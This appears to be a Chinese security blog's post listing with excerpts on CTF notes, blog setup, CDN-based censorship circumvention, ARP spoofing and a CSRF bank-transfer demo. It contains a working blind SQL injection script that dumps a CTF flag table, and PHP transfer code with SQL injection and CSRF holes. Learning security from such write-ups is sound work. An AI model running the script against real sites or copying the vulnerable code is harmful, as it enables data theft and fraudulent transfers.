Posts

养成题后整理是一个很好的习惯，尽管有点累而且麻烦，但至少能够方便自己回顾错误的地方 web服务器默认访问日志文件 首先是nginx /var/log/nginx/access.log 里面记录了每次用户访问后的User-Agent 同样，Apache也有 /var/log/httpd/access_log 当然Apache的我没有具体验证过，可靠性有待考究 弱比较漏洞 参考博客：PHP弱类型比较（松散比较）方面的漏洞 SQL盲注 盲注其实就是通过页面的特殊响应猜测注入结果是否正常。下面主要分享一下几种常见绕过 过滤空格, 可以使用括号() 或者注释/**/ 绕过 过滤and, 可以使用or替代 过滤union, 可以用盲注替代联合注入 过滤逗号, 可以使用特殊语法绕过, 比如:substr(database(),1,1)，这里**可以用substr(database() from 1 for 1)来代替** 下面是一个常见的脱库脚本 import requests url = 'http://53aab0c2-b451-4910-a1e0-f15fd9e64b2a.challenge.ctf.show:8080/index.php?id=-1/**/or/**/' name = '' # 循环45次( 循环次数按照返回的字符串长度自定义) for i in range(1, 45): # 获取当前使用的数据库 # payload = 'ascii(substr(database()from/**/%d/**/for/**/1))=%d' # 获取当前数据库的所有表 # payload = 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d' # 获取flag表的字段 # payload = 'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%d/**/for/**/1))=%d' # 获取flag表的数据 payload = 'ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d' count = 0 print('正在获取第 %d 个字符' % i) # 截取SQL查询结果的每个字符, 并判断字符内容 for j in range(31, 128): result = requests.get(url + payload % (i, j)) if 'If' in result.text: name += chr(j) print('数据库名/表名/字段名/数据: %s' % name) break # 如果某个字符不存在,则停止程序 count += 1 if count >= (128 - 31): exit() 信息搜集 肯定会经常见到页面一片空白的情况，或者只有短短的一句类似“where is flag？”这样看着就来气的风凉话 dirsearch就是个不错的信息搜集工具，这里只做提醒，不做详细介绍 ...

众所周知，一个完整博客网站的组成离不开必要的三件套 1.网站基本框架 2.运行网站的服务器 3.一个自己喜欢的域名 可以说是缺一不可 下面就带大家看看完整的博客网站是如何被搭建起来的 准备工作 1.网站框架——Typecho Typecho 是国内开发者开发的一款开源免费的动态博客程序，可以运行在基于 PHP 环境的各种平台上。 官网：Typecho Official Site GitHub：typecho: A PHP Blogging Platform. 相比于同为动态博客并且广为人知的 WordPress 来说，Typecho 的一大特点就是 “精简”。全部文件不足 500KB，但却也实现了完整的主题和插件支持。博客程序很轻量，资源占用也很低，原生支持 Markdown 语法。属于省心并且简洁的博客类型。 2.服务器购买 这里我推荐桔子数据的香港云，关键是价格便宜（不是广告！） 这里是传送门 个人建议买这个 配置随意，但是系统记得选择Ubuntu 20 等待机器初始化完成后再点开安全组 用ssh为名字添加一组新的策略，再点击应用即可 3.域名购买 域名推荐在 Namesilo 购买，价格便宜，同时赠送永久免费的隐私保护。 官网：Namesilo 首先 注册账户。注册信息建议使用美国生成信息，国家选择美国（United States），并勾选 “Keep my information private” 默认使用隐私保护。 然后 搜索想要注册的域名，进行购买。 设置域名续费规则、注册时长等。在 “Have a Coupon……” 处输入优惠码 okoff 或者 go2think ，点击 “Submit” 应用，优惠一美元。 完成后点击 “CONTINUE” 付款，支持支付宝和 Paypal 之后进行域名解析。先进行登录 进到个人主页后点击 ...

如果有人不相信数学是简单的，那是因为他没有意识到人生有多复杂 ——冯・诺伊曼 让我们先从一个超简单的道理说起。 计算机，应该都有吧？它比人类更擅长的事情是什么？答案肯定是计算 但假如有一张图片摆在你和你的电脑面前 你会第一眼看到什么？一只猫？一块木板？这对你来说不是什么困难的事情 但相比之下，你的电脑要看得懂这张图片，并不是那么容易，事实上，是很困难的 因此我们有理由怀疑观看图片内容这项功能是需要人类智能的，而这是机器所缺乏的 无论我们的机器多复杂多强大，它们依然不是人类 但正因为计算机速度非常快，并且不知疲倦，我们也可以希望计算机能够更好的解决识别图片这项功能 人工智能探讨的就是这项难题 当然，计算机将永远使用电子器件制造，因此人工智能的研究任务就是找到新方法或者新算法，尝试求解这类相对困难的问题。即使不能完美解决，但我们只要求计算机足够出色，让人觉得这是智能的作用 下一章：神经网络是怎么工作的？

CDN原理 我们先来看一下正常上网的拓补图 图中是一个正常的网站请求，这个应该不难理解 但不知道你有没有注意到一个问题，如果这个网站是一个被架设在大洋彼岸的网站，那么网站的内容要想从地球的另一端来到你的电脑，得有多费劲？ 所以聪明的人类就发明出了一种十分暴力但却有效的方法来解决这一世纪难题，也就是将网站的内容先缓存到一台离你的电脑比较近的服务器上存起来，等你要用的时候直接调用这台服务器上的内容就行。而这种技术，就被叫做CDN存储技术（Content Delivery Network） 这样的方法看着简单，但却十分有效。不过也有一个致命硬伤，就是你没法保证你所访问内容的时效性。因为听名字就知道，缓存，就是暂时存储的意思，那就必然会有时间差的存在。而这个时间差的大小也就取决于网站管理者，不过一般来说这个时间差和网站访问速度是成反比的 不过对于科学上网而言，内容储存并不是我们关注的重点。重点是CDN服务所提供的域名。对于一个可以高速裸奔的科学上网的节点，其最大的痛处想必就是稳定性没法得到保证。因此，想办法提升稳定性就变成了非安全节点的关键。而一个节点之所以会被长城防火墙干趴，本质上就是节点ip或域名被拉了黑名单。 而CDN的存在就误打误撞地解决了这个问题。 当防火墙在探测你的节点ip时，碰到的确实CDN的域名。而CDN本身只起到了挡箭牌的作用，就算一个CDN域名被拉黑了，再把你的节点服务器重新再部署一个就行了。而且整个过程都是免费的（如使用cloudlare），这对科学上网来说简直就算一大神器。 但CDN也不是完全没有缺点。CDN确实能够保障你的节点安全，但速度却大打折扣。从上面的原理图里应该可以看出CDN服务器其实本身就是一个挂在墙外的东西，即便你的节点本身速度够快，但被CDN这么一折腾，也还是会有很大程度上的降速。因此，给你的节点套CDN作为一个备选方案，才算是一个不错的选择 ARP欺骗 ARP（Address Resolution Protocol），中文解释为地址解析协议，是根据IP地址获取物理地址的一个TCP/IP协议。 ARP大致工作流程如下： 主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机，并接收返回消息，以此确定目标的物理地址。 收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间，下次请求时直接查询ARP缓存以节约资源。 地址解析协议是建立在网络中各个主机互相信任的基础上的，网络上的主机可以自主发送ARP应答消息，其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存（重点来了，我们要利用的就是这个点！） 攻击者可以向某一主机发送伪ARP应答报文，使其发送的信息无法到达预期的主机或到达错误的主机，这就构成了一个ARP欺骗。ARP命令可用于查询本机ARP缓存中IP地址和MAC地址的对应关系、添加或删除静态对应关系等。 那么 我们如何利用ARP协议来进行断网攻击呢？大致思路如下： 首先，ARP是建立在网络中各个主机互相信任的基础上的，它的诞生使得网络能够更加高效的运行，但其本身也存在缺陷： ARP地址转换表（ARP缓存）是依赖于计算机中高速缓冲存储器动态更新的，而高速缓冲存储器的更新是受到更新周期的限制的，只保存最近使用的地址的映射关系表项，这使得攻击者有了可乘之机，可以在高速缓冲存储器更新表项之前修改地址转换表，实现攻击。ARP请求为广播形式发送的，网络上的主机可以自主发送ARP应答消息，并且当其他主机收到应答报文时不会检测该报文的真实性就将其记录在本地的MAC地址转换表，这样攻击者就可以向目标主机发送伪ARP应答报文，从而篡改本地的MAC地址表。这就是所谓的APR欺骗攻击。 ARP欺骗可以导致目标计算机与网关通信失败，更会导致通信重定向，所有的数据都会通过攻击者的机器，因此存在极大的安全隐患，这里我们是使目标主机通信失败，之后的教程会介绍重定向的方法。 ARP攻击大致流程如下： 第一步：假设主机A访问某网站，那么要告知某网站我的IP和MAC地址，但这是以广播的方式告知的。 第二步，由于是广播方式告知，猥琐的B主机也知道了A的IP和Mac地址，于是猥琐的B主机把自己伪装成某网站，给A发送回复，A误以为B就是某网站，因此更新了自己本机的ARP缓存。 第三步，两者建立连接，A不断将自己的请求发给B，可怜的某网站被挂在一遍了。如果B转发A的请求给某网站，再转发给A，那相当于A的流量都从B经过，这就是步骤4，因此可以会话劫持；如果B给A的是一个假地址，那么可怜的A永远上不了网了。

“欺骗的最高境界，就是不说任何一句假话” 昨天和实验室的朋友在聊天时提到了一些典型的漏洞案例，我用白话向他们介绍了一些攻击手段，不乏ARP欺骗、metaploit病毒制作、常规抓包等，其中“访问一些不该访问的页面就能把你银行卡里的钱转走”好像让他们比较提起兴趣，正好之前给Echo培训的时候也演示过，反映还不错。下面我尽量用所有0基础者都能听懂的话，再复现一遍整个过程 下面来介绍一下实验环境 环境 受害者：windows 7，chrome浏览器 攻击者：windows 11（黄色网站运营者） 银行：windows 7,Mysql 5.7数据库 背景 有三个银行账户，账户ID、密码、原始金额如下 实验开始 （实验确保严格按照下面步骤进行，无多余操作） 某天康康想给杰瑞转1000块钱，于是就正常地打开了银行的网站并登录，看到了自己账户的余额和转账的界面 出于平时“网上冲浪”的经验，对于1000块的巨款，康康谨慎地打开了所有杀毒软件，在确保了“全盘扫描”全部正常并绿灯通行后，才输入了杰瑞银行账号并进行了转账 杰瑞此时也收到了这1000块钱，这一切似乎都很安全并且正常，至少目前为止是这样的 转完帐后闲来无事的康康，打算看点网站来保障青少年的身心健康，于是他“安全退出”了银行账户后，便进入了下面这个网站 激动的康康决定马上接受美女荷官的邀请，于是他便点进了链接 在经过一番荷官的心理辅导后，康康看了一眼自己的手机，发现手机短信似乎多了一条来自银行的短信。嗯？1000块转账？怎么转给杰瑞的钱到现在才提醒 不信邪的康康决定打开账户一探究竟，但让他不解的是，为什么银行卡里的钱又少了1000？ 不行，一定是我眼花了，嗯，一定是辅导还不到位，再看一遍就好了 机智的康康再次刷新了荷官的页面 又过了一段时间，康康再次返回银行账户界面，7000？？wtf？？ 康康急忙打电话给杰瑞，发现杰瑞的账户里只收到了最开始的1000块 这期间究竟发生了什么呢？让我们切换一下视角，从银行的数据库这个“上帝视角”来一探究竟 你一定已经发现了康康的2000去了哪，但是这期间究竟发生了什么呢？ 原理分析 我们先来看一下CSRF漏洞的wiki定义 其实简单来说就是以利用受害者本身被银行信任的设备请发起正常的转账请求，但显然CSRF漏洞的应用远不止这一种 我们先来看一下正常银行转账页面发起转账请求的代码 <?php include("config.php"); if(isset($_COOKIE["userid1"]) && isset($_COOKIE["pass1"])) { $TOID=$_GET['nameid']; $TOMONEY= $_GET['balance']; include("conn/conn.php"); $sql=$db->query("select * from account where userid='".$TOID."'"); $sqlres = $sql->fetch(); if($sqlres['userid'] != $TOID) { echo "<script language=\"javascript\">"; echo "alert('用户名或密码错误!')"; echo "return(true)"; echo "location.href=\"default.php\""; echo "</script>"; } $balance_new = $TOMONEY + $sqlres['balance']; $sql=$db->exec("update account set balance='".$balance_new."' where userid='".$TOID."'"); $sql=$db->query("select * from account where userid='".$_COOKIE['userid1']."'"); $sqlres = $sql->fetch(); $balance_new = $sqlres['balance']- $TOMONEY; $sql=$db->exec("update account set balance='".$balance_new."' where userid='".$_COOKIE['userid1']."'"); echo "<script language=\"javascript\">"; echo "location.href=\"default.php\""; echo "</script>"; } ?> 可以看到整个过程其实很好理解，就是调用银行本身数据库进行数据增减 接下来我们再看看荷官页面的代码，相信你就知道问题出在哪里了 ...